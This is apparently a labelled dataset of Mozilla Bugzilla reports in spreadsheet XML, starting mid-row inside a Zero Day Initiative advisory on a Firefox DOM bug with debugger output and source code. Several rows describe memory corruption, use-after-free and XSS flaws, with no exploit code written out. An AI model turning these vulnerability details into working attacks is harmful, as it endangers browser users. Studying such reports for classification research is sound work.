60da0000 63351000   xul        (private pdb symbols)  z:\export\symbols\xul.pdb\38E42F42A4D0489D8C1F967BEADFCA642\xul.pdb
    Loaded symbol image file: C:\Program Files\Mozilla Firefox\xul.dll
    Image path: C:\Program Files\Mozilla Firefox\xul.dll
    Image name: xul.dll
    Timestamp:        Fri Feb 05 18:28:31 2016 (56B55A4F)
    CheckSum:         0250EC9D
    ImageSize:        025B1000
    File version:     44.0.1.5879
    Product version:  44.0.1.5879
    File flags:       0 (Mask 3F)
    File OS:          4 Unknown Win32
    File type:        2.0 Dll
    File date:        00000000.00000000
    Translations:     0000.04b0
    CompanyName:      Mozilla Foundation
    ProductName:      Firefox
    InternalName:     Firefox
    OriginalFilename: xul.dll
    ProductVersion:   44.0.1
    FileVersion:      44.0.1
    FileDescription:  44.0.1
    LegalCopyright:   License: MPL 2
    LegalTrademarks:  Mozilla
    Comments:         Mozilla
0:000&gt; vertarget
Windows 8 Version 9600 UP Free x86 compatible
Product: WinNt, suite: SingleUserTS
kernel32.dll version: 6.3.9600.17415 (winblue_r4.141028-1500)
Machine Name:
Debug session time: Wed Feb 10 15:28:01.372 2016 (UTC - 8:00)
System Uptime: 0 days 0:19:13.452
Process Uptime: 0 days 0:01:40.437
  Kernel time: 0 days 0:00:00.578
  User time: 0 days 0:00:02.218
```
Root of the bug:
dom/html/nsHTMLDocument.cpp:
```
void
nsHTMLDocument::SetBody(nsGenericHTMLElement* newBody, ErrorResult&amp; rv)
{
  Element* root = GetRootElement();
  // The body element must be either a body tag or a frameset tag. And we must
  // have a html root tag, otherwise GetBody will not return the newly set
  // body.
  if (!newBody ||
      !newBody-&gt;IsAnyOfHTMLElements(nsGkAtoms::body, nsGkAtoms::frameset) ||
      !root || !root-&gt;IsHTMLElement() ||
      !root-&gt;IsHTMLElement(nsGkAtoms::html)) {
    rv.Throw(NS_ERROR_DOM_HIERARCHY_REQUEST_ERR);
    return;
  }
  // Use DOM methods so that we pass through the appropriate security checks.
  nsCOMPtr&lt;Element&gt; currentBody = GetBodyElement();
  if (currentBody) {
    root-&gt;ReplaceChild(*newBody, *currentBody, rv);
  } else {
    root-&gt;AppendChild(*newBody, rv);
  }
}
```
dom/base/nsINode.h:
```
  nsINode* AppendChild(nsINode&amp; aNode, mozilla::ErrorResult&amp; aError)
  {
    return InsertBefore(aNode, nullptr, aError);
  }
```
```
  nsINode* InsertBefore(nsINode&amp; aNode, nsINode* aChild,
                        mozilla::ErrorResult&amp; aError)
  {
    return ReplaceOrInsertBefore(false, &amp;aNode, aChild, aError);
  }
```
dom/base/nsINode.cpp:
```
nsINode*
nsINode::ReplaceOrInsertBefore(bool aReplace, nsINode* aNewChild,
                               nsINode* aRefChild, ErrorResult&amp; aError)
{
  // XXXbz I wish I could assert that nsContentUtils::IsSafeToRunScript() so we
  // could rely on scriptblockers going out of scope to actually run XBL
  // teardown, but various crud adds nodes under scriptblockers (e.g. native
  // anonymous content).  The only good news is those insertions can't trigger
  // the bad XBL cases.
  MOZ_ASSERT_IF(aReplace, aRefChild);
  EnsurePreInsertionValidity1(*aNewChild, aRefChild, aError);
  if (aError.Failed()) {
    return nullptr;
  }
  uint16_t nodeType = aNewChild-&gt;NodeType();
  // Before we do anything else, fire all DOMNodeRemoved mutation events
  // We do this up front as to avoid having to deal with script running
  // at random places further down.
  // Scope firing mutation events so that we don't carry any state that
  // might be stale
  {
    // This check happens again further down (though then using IndexOf).
    // We're only checking this here to avoid firing mutation events when
    // none should be fired.
    // It's ok that we do the check twice in the case when firing mutation
    // events as we need to recheck after running script anyway.
    if (aRefChild &amp;&amp; aRefChild-&gt;GetParentNode() != this) {
      aError.Throw(NS_ERROR_DOM_NOT_FOUND_ERR);
      return nullptr;
    }
    // If we're replacing, fire for node-to-be-replaced.
    // If aRefChild == aNewChild then we'll fire for it in check below
    if (aReplace &amp;&amp; aRefChild != aNewChild) {
      nsContentUtils::MaybeFireNodeRemoved(aRefChild, this, OwnerDoc());
    }
    // If the new node already has a parent, fire for removing from old
    // parent
    nsINode* oldParent = aNewChild-&gt;GetParentNode();
    if (oldParent) {
      nsContentUtils::MaybeFireNodeRemoved(aNewChild, oldParent,
                                           aNewChild-&gt;OwnerDoc());
    }
    // If we're inserting a fragment, fire for all the children of the
    // fragment
    if (nodeType == nsIDOMNode::DOCUMENT_FRAGMENT_NODE) {
      static_cast&lt;FragmentOrElement*&gt;(aNewChild)-&gt;FireNodeRemovedForChildren();
    }
    // Verify that our aRefChild is still sensible
    if (aRefChild &amp;&amp; aRefChild-&gt;GetParentNode() != this) {
      aError.Throw(NS_ERROR_DOM_NOT_FOUND_ERR);
      return nullptr;
    }
  }
  EnsurePreInsertionValidity2(aReplace, *aNewChild, aRefChild, aError);
```
-- CREDIT ---------------------------------------
This vulnerability was discovered by:
   lokihardt working with HP's Zero Day Initiative</t>
        </is>
      </c>
      <c r="X2863" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2864">
      <c r="A2864" t="n">
        <v>371321</v>
      </c>
      <c r="B2864" t="inlineStr">
        <is>
          <t>2007-02-22 17:35:49 -0800</t>
        </is>
      </c>
      <c r="C2864" t="inlineStr">
        <is>
          <t>memory corruption when onUnload is mixed with document.write()s</t>
        </is>
      </c>
      <c r="D2864" t="inlineStr">
        <is>
          <t>2007-03-08 13:56:14 -0800</t>
        </is>
      </c>
      <c r="E2864" t="n">
        <v>1</v>
      </c>
      <c r="F2864" t="n">
        <v>1</v>
      </c>
      <c r="G2864" t="n">
        <v>3</v>
      </c>
      <c r="H2864" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2864" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2864" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K2864" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2864" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2864" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2864" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2864" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2864" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q2864" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2864" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2864" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2864" t="n">
        <v>1</v>
      </c>
      <c r="U2864" t="n">
        <v>1</v>
      </c>
      <c r="V2864" t="n">
        <v>36</v>
      </c>
      <c r="W2864" t="inlineStr">
        <is>
          <t>Firefox is susceptible to a seemingly pretty nasty, and apparently
easily exploitable memory corruption vulnerability. When a location
transition occurs and the structure of a document is modified from within
onUnload event handler, freed DOM-related memory structures are left in inconsistent state, possibly leading to a remote compromise.
A quick test case that crashes while trying to follow corrupted pointers
(can be forced to write, too; tested on Windows XP, IA32):
  http://lcamtuf.coredump.cx/ietrap/testme.html
Cheers,
/mz</t>
        </is>
      </c>
      <c r="X2864" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2865">
      <c r="A2865" t="n">
        <v>831618</v>
      </c>
      <c r="B2865" t="inlineStr">
        <is>
          <t>2013-01-16 17:49:20 -0800</t>
        </is>
      </c>
      <c r="C2865" t="inlineStr">
        <is>
          <t>[Google Analytics] Track Article Reads in Google Analytics</t>
        </is>
      </c>
      <c r="D2865" t="inlineStr">
        <is>
          <t>2013-02-05 13:33:34 -0800</t>
        </is>
      </c>
      <c r="E2865" t="n">
        <v>1</v>
      </c>
      <c r="F2865" t="n">
        <v>1</v>
      </c>
      <c r="G2865" t="n">
        <v>5</v>
      </c>
      <c r="H2865" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2865" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J2865" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K2865" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2865" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2865" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2865" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2865" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2865" t="inlineStr">
        <is>
          <t>u=sumo-team c=analytics p=2 s=2013.2</t>
        </is>
      </c>
      <c r="Q2865" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2865" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2865" t="inlineStr">
        <is>
          <t>2013Q1</t>
        </is>
      </c>
      <c r="T2865" t="n">
        <v>1</v>
      </c>
      <c r="U2865" t="n">
        <v>0</v>
      </c>
      <c r="V2865" t="n">
        <v>11</v>
      </c>
      <c r="W2865" t="inlineStr">
        <is>
          <t>One of the things that we don't have good visibility and it will allow us to have better understanding of how users interact with our site is to understand how many people actually read articles (i.e. not only open the KB article but actually spend some time on it)
My proposal to work around this is to create an GA Event that captures how many people spends more than a fixed amount of time in KB articles. I think that we could start low, something like 10 seconds to ensure that even short articles are captured here. By using Events we preserve the information that we learn from pageviews but we create a new layer of information.
The implementation will require to add the following like to the Analytics code when the page that we are showing is a KB article (not a navigation page or a forum page):
setTimeout("_gaq.push(['_trackEvent', 'Article_Read', $article_slug])",10000);
*Again, sorry for my PHP notation
This line needs to be just after the following one:
_gaq.push(['_trackPageview']);
For more information on Event Tracking: https://developers.google.com/analytics/devguides/collection/gajs/eventTrackerGuide
Let me know if you need more info.</t>
        </is>
      </c>
      <c r="X2865" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2866">
      <c r="A2866" t="n">
        <v>1017634</v>
      </c>
      <c r="B2866" t="inlineStr">
        <is>
          <t>2014-05-29 08:13:11 -0700</t>
        </is>
      </c>
      <c r="C2866" t="inlineStr">
        <is>
          <t>New spot test images don't have v4l2loopback configured</t>
        </is>
      </c>
      <c r="D2866" t="inlineStr">
        <is>
          <t>2020-01-10 08:23:56 -0800</t>
        </is>
      </c>
      <c r="E2866" t="n">
        <v>1</v>
      </c>
      <c r="F2866" t="n">
        <v>1</v>
      </c>
      <c r="G2866" t="n">
        <v>6</v>
      </c>
      <c r="H2866" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2866" t="inlineStr">
        <is>
          <t>Infrastructure &amp; Operations Graveyard</t>
        </is>
      </c>
      <c r="J2866" t="inlineStr">
        <is>
          <t>CIDuty</t>
        </is>
      </c>
      <c r="K2866" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2866" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2866" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2866" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2866" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2866" t="inlineStr"/>
      <c r="Q2866" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2866" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2866" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2866" t="n">
        <v>1</v>
      </c>
      <c r="U2866" t="n">
        <v>0</v>
      </c>
      <c r="V2866" t="n">
        <v>10</v>
      </c>
      <c r="W2866" t="inlineStr">
        <is>
          <t>In bug 826265 we got the v4l2loopback driver configured on the Linux test slaves. However, when I landed bug 815002 it showed that we have some slaves that are not properly configured. Rail says they're the new spot images and it has something to do with puppet.</t>
        </is>
      </c>
      <c r="X2866" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2867">
      <c r="A2867" t="n">
        <v>1337037</v>
      </c>
      <c r="B2867" t="inlineStr">
        <is>
          <t>2017-02-06 09:49:42 -0800</t>
        </is>
      </c>
      <c r="C2867" t="inlineStr">
        <is>
          <t>Add stub attribution field to retention dataset</t>
        </is>
      </c>
      <c r="D2867" t="inlineStr">
        <is>
          <t>2018-10-15 11:08:31 -0700</t>
        </is>
      </c>
      <c r="E2867" t="n">
        <v>1</v>
      </c>
      <c r="F2867" t="n">
        <v>1</v>
      </c>
      <c r="G2867" t="n">
        <v>6</v>
      </c>
      <c r="H2867" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2867" t="inlineStr">
        <is>
          <t>Cloud Services Graveyard</t>
        </is>
      </c>
      <c r="J2867" t="inlineStr">
        <is>
          <t>Metrics: Pipeline</t>
        </is>
      </c>
      <c r="K2867" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2867" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2867" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2867" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2867" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2867" t="inlineStr"/>
      <c r="Q2867" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2867" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2867" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2867" t="n">
        <v>0</v>
      </c>
      <c r="U2867" t="n">
        <v>0</v>
      </c>
      <c r="V2867" t="n">
        <v>5</v>
      </c>
      <c r="W2867" t="inlineStr">
        <is>
          <t>The attribution field was added to the main summary in bug 1331082. This field belongs in the retention dataset because it helps follow clients over time in cohorts. I have created an example redash query that will feed from this data source.[1]
[1] https://sql.telemetry.mozilla.org/queries/2655</t>
        </is>
      </c>
      <c r="X2867" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2868">
      <c r="A2868" t="n">
        <v>1660223</v>
      </c>
      <c r="B2868" t="inlineStr">
        <is>
          <t>2020-08-20 05:37:09 -0700</t>
        </is>
      </c>
      <c r="C2868" t="inlineStr">
        <is>
          <t>Crash in [@ gtk_printer_get_name]</t>
        </is>
      </c>
      <c r="D2868" t="inlineStr">
        <is>
          <t>2024-10-23 15:53:45 -0700</t>
        </is>
      </c>
      <c r="E2868" t="n">
        <v>1</v>
      </c>
      <c r="F2868" t="n">
        <v>1</v>
      </c>
      <c r="G2868" t="n">
        <v>3</v>
      </c>
      <c r="H2868" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2868" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2868" t="inlineStr">
        <is>
          <t>Printing: Output</t>
        </is>
      </c>
      <c r="K2868" t="inlineStr">
        <is>
          <t>Firefox 81</t>
        </is>
      </c>
      <c r="L2868" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2868" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2868" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2868" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2868" t="inlineStr">
        <is>
          <t>[print2020][old-ui?][tbird crash][adv-main122+][adv-esr115.7+]</t>
        </is>
      </c>
      <c r="Q2868" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2868" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S2868" t="inlineStr">
        <is>
          <t>122 Branch</t>
        </is>
      </c>
      <c r="T2868" t="n">
        <v>1</v>
      </c>
      <c r="U2868" t="n">
        <v>0</v>
      </c>
      <c r="V2868" t="n">
        <v>63</v>
      </c>
      <c r="W2868" t="inlineStr">
        <is>
          <t>This bug is for crash report bp-4cb207df-64d5-4ec6-b5be-db1ec0200820.
Top 10 frames of crashing thread:
```
0 libgtk-3.so.0 gtk_printer_get_name ./debian/build/deb/gtk/../../../../gtk/gtkprinter.c:436
1 libprintbackend-cups.so &lt;name omitted&gt; ../../../../../../modules/printbackends/cups/gtkprintbackendcups.c:1874
2 libglib-2.0.so.0 &lt;name omitted&gt; ../../../glib/glist.c:922
3 libprintbackend-cups.so cups_request_printer_list_cb ../../../../../../modules/printbackends/cups/gtkprintbackendcups.c:3630
4 libprintbackend-cups.so cups_dispatch_watch_dispatch ../../../../../../modules/printbackends/cups/gtkprintbackendcups.c:1581
5 libglib-2.0.so.0 g_main_context_dispatch ../../../glib/gmain.c:3974
6 libglib-2.0.so.0 g_main_context_iterate ../../../glib/gmain.c:4047
7 libglib-2.0.so.0 &lt;name omitted&gt; ../../../glib/gmain.c:4241
8 libgtk-3.so.0 gtk_enumerate_printers ./debian/build/deb/gtk/../../../../gtk/gtkprinter.c:1285
9 libxul.so mozilla::detail::RunnableMethodImpl&lt;nsDeviceContextSpecGTK*, void  xpcom/threads/nsThreadUtils.h:1240
```
**Affected versions**
* 81.0a1 (BuildId:20200819212829)
**Affected platforms**
* Ubuntu 20.04 64bit.
**Additional notes**
* The drivers for the printers were installed with hplip  3.20.6 (latest available at this time).
* This could have been an isolated case, I'll look into it in order to get some more specific steps.
**Steps to reproduce**
1. Fresh install of the printer (HP MFP M28A in my case)
2. Open Firefox.
3. Navigate to any page and print it.
**Expected result**
* Page is correctly printed.
**Actual result**
*  Browser crashed and page was not printed.
**Regression Window**
* Not sure if this is a regression or not since I've only ran into it once so far.
**[Suggested Severity]**  
* S3</t>
        </is>
      </c>
      <c r="X2868" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2869">
      <c r="A2869" t="n">
        <v>472950</v>
      </c>
      <c r="B2869" t="inlineStr">
        <is>
          <t>2009-01-09 19:09:11 -0800</t>
        </is>
      </c>
      <c r="C2869" t="inlineStr">
        <is>
          <t>"ASSERTION: child list is not empty for initial reflow" with :first-letter, rtl, pre</t>
        </is>
      </c>
      <c r="D2869" t="inlineStr">
        <is>
          <t>2015-04-16 11:12:49 -0700</t>
        </is>
      </c>
      <c r="E2869" t="n">
        <v>1</v>
      </c>
      <c r="F2869" t="n">
        <v>1</v>
      </c>
      <c r="G2869" t="n">
        <v>3</v>
      </c>
      <c r="H2869" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2869" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2869" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K2869" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2869" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2869" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2869" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2869" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2869" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q2869" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2869" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2869" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2869" t="n">
        <v>1</v>
      </c>
      <c r="U2869" t="n">
        <v>0</v>
      </c>
      <c r="V2869" t="n">
        <v>20</v>
      </c>
      <c r="W2869" t="inlineStr">
        <is>
          <t>Created attachment 356288
testcase
###!!! ASSERTION: child list is not empty for initial reflow: 'mFrames.IsEmpty()', file /Users/jruderman/central/layout/generic/nsInlineFrame.cpp, line 324
###!!! ASSERTION: Some objects allocated with AllocateFrame were not freed: 'mFrameCount == 0', file /Users/jruderman/central/layout/base/nsPresShell.cpp, line 673
These are the same assertions as in bug 429968, which was fixed recently.  This is probably related to bug 429969.  Security-sensitive because of the second assertion and the relation to those two bugs.</t>
        </is>
      </c>
      <c r="X2869" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2870">
      <c r="A2870" t="n">
        <v>647678</v>
      </c>
      <c r="B2870" t="inlineStr">
        <is>
          <t>2011-04-04 07:12:55 -0700</t>
        </is>
      </c>
      <c r="C2870" t="inlineStr">
        <is>
          <t>[ReleaseChannels] Add Rapid-Release channels to product-details library</t>
        </is>
      </c>
      <c r="D2870" t="inlineStr">
        <is>
          <t>2012-08-23 00:16:07 -0700</t>
        </is>
      </c>
      <c r="E2870" t="n">
        <v>1</v>
      </c>
      <c r="F2870" t="n">
        <v>1</v>
      </c>
      <c r="G2870" t="n">
        <v>5</v>
      </c>
      <c r="H2870" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2870" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J2870" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2870" t="inlineStr">
        <is>
          <t>Firefox 5</t>
        </is>
      </c>
      <c r="L2870" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2870" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2870" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2870" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2870" t="inlineStr"/>
      <c r="Q2870" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2870" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2870" t="inlineStr">
        <is>
          <t>2.5</t>
        </is>
      </c>
      <c r="T2870" t="n">
        <v>1</v>
      </c>
      <c r="U2870" t="n">
        <v>0</v>
      </c>
      <c r="V2870" t="n">
        <v>38</v>
      </c>
      <c r="W2870" t="inlineStr">
        <is>
          <t>The tracking for the new Firefox 5/next rapid-release channels is Bug 646236.
The product details library can produce a final-release or beta button right now, but it will also need to be able to produce download buttons for the "Aurora" build channel too.
Assigning to morgamic in hopes that he can reassign to the appropriate person.</t>
        </is>
      </c>
      <c r="X2870" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2871">
      <c r="A2871" t="n">
        <v>526500</v>
      </c>
      <c r="B2871" t="inlineStr">
        <is>
          <t>2009-11-04 08:23:15 -0800</t>
        </is>
      </c>
      <c r="C2871" t="inlineStr">
        <is>
          <t>Use-after-free error in HTML parser when handling out-of-memory conditions (SA37242)</t>
        </is>
      </c>
      <c r="D2871" t="inlineStr">
        <is>
          <t>2020-12-09 12:56:52 -0800</t>
        </is>
      </c>
      <c r="E2871" t="n">
        <v>1</v>
      </c>
      <c r="F2871" t="n">
        <v>1</v>
      </c>
      <c r="G2871" t="n">
        <v>3</v>
      </c>
      <c r="H2871" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2871" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2871" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K2871" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2871" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2871" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2871" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2871" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2871" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q2871" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2871" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2871" t="inlineStr">
        <is>
          <t>mozilla1.9.2</t>
        </is>
      </c>
      <c r="T2871" t="n">
        <v>1</v>
      </c>
      <c r="U2871" t="n">
        <v>0</v>
      </c>
      <c r="V2871" t="n">
        <v>40</v>
      </c>
      <c r="W2871" t="inlineStr">
        <is>
          <t>From Secunia to security@:
---------------------------
Secunia Research has discovered a vulnerability in Mozilla Firefox,
which can be exploited by malicious people to compromise a user's
system.
The vulnerability is caused due to a use-after-free error when handling
out-of-memory conditions. This can be exploited to trigger a memory
corruption via a specially crafted web page.
Successful exploitation may allow execution of arbitrary code.
The vulnerability is confirmed in version 3.5.4. Other versions may also
be affected.
Vulnerability Details:
----------------------
Used memory is incorrectly freed when insufficient space is available to
process HTML input. Memory occupied by in-use objects is freed and
filled with text placed in the HTML body after all available virtual
address space is exhausted. While crashes occur at random locations,
most of the observed cases would result in the execution of arbitrary
code when calling methods from freed objects.
Closing comments:
-----------------
We have assigned this vulnerability Secunia advisory SA37242 and CVE
identifier CVE-2009-1571.
Credits should go to:
Alin Rad Pop, Secunia Research.
------------------------</t>
        </is>
      </c>
      <c r="X2871" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2872">
      <c r="A2872" t="n">
        <v>667055</v>
      </c>
      <c r="B2872" t="inlineStr">
        <is>
          <t>2011-06-24 14:13:19 -0700</t>
        </is>
      </c>
      <c r="C2872" t="inlineStr">
        <is>
          <t>rpm builds are piling up in latest-* directories on stage</t>
        </is>
      </c>
      <c r="D2872" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E2872" t="n">
        <v>1</v>
      </c>
      <c r="F2872" t="n">
        <v>1</v>
      </c>
      <c r="G2872" t="n">
        <v>5</v>
      </c>
      <c r="H2872" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2872" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2872" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2872" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2872" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2872" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2872" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2872" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2872" t="inlineStr">
        <is>
          <t>[rpm][cleanup]</t>
        </is>
      </c>
      <c r="Q2872" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2872" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2872" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2872" t="n">
        <v>1</v>
      </c>
      <c r="U2872" t="n">
        <v>0</v>
      </c>
      <c r="V2872" t="n">
        <v>5</v>
      </c>
      <c r="W2872" t="inlineStr">
        <is>
          <t>Because our rpms include the build id in the filename, they don't simply overwrite the current rpm in the latest dirs on stage. 
e.g.
http://stage.mozilla.org/pub/mozilla.org/firefox/nightly/latest-mozilla-central/
It looks like the files get purged eventually when they hit the global retention threshold, but we should really only have one rpm per linux arch in each latest dir.
My preference here would be to strip the build id out of the rpm filename for the copy going to latest. That could probably be done using post_upload.py.
We'll also need to clean out the older rpm files from all the latest-* dirs on stage.</t>
        </is>
      </c>
      <c r="X2872" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2873">
      <c r="A2873" t="n">
        <v>648655</v>
      </c>
      <c r="B2873" t="inlineStr">
        <is>
          <t>2011-04-08 14:53:39 -0700</t>
        </is>
      </c>
      <c r="C2873" t="inlineStr">
        <is>
          <t>Mozilla Hacks - Hacks2010 Template XSS Bugs</t>
        </is>
      </c>
      <c r="D2873" t="inlineStr">
        <is>
          <t>2024-05-29 15:55:15 -0700</t>
        </is>
      </c>
      <c r="E2873" t="n">
        <v>1</v>
      </c>
      <c r="F2873" t="n">
        <v>1</v>
      </c>
      <c r="G2873" t="n">
        <v>5</v>
      </c>
      <c r="H2873" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2873" t="inlineStr">
        <is>
          <t>Developer Engagement</t>
        </is>
      </c>
      <c r="J2873" t="inlineStr">
        <is>
          <t>Mozilla Hacks</t>
        </is>
      </c>
      <c r="K2873" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2873" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2873" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2873" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2873" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2873" t="inlineStr">
        <is>
          <t>[infrasec:xss][ws:high][sepcification-like][type:bug]</t>
        </is>
      </c>
      <c r="Q2873" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2873" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2873" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2873" t="n">
        <v>1</v>
      </c>
      <c r="U2873" t="n">
        <v>0</v>
      </c>
      <c r="V2873" t="n">
        <v>21</v>
      </c>
      <c r="W2873" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16 ( .NET CLR 3.5.30729; .NET4.0E)
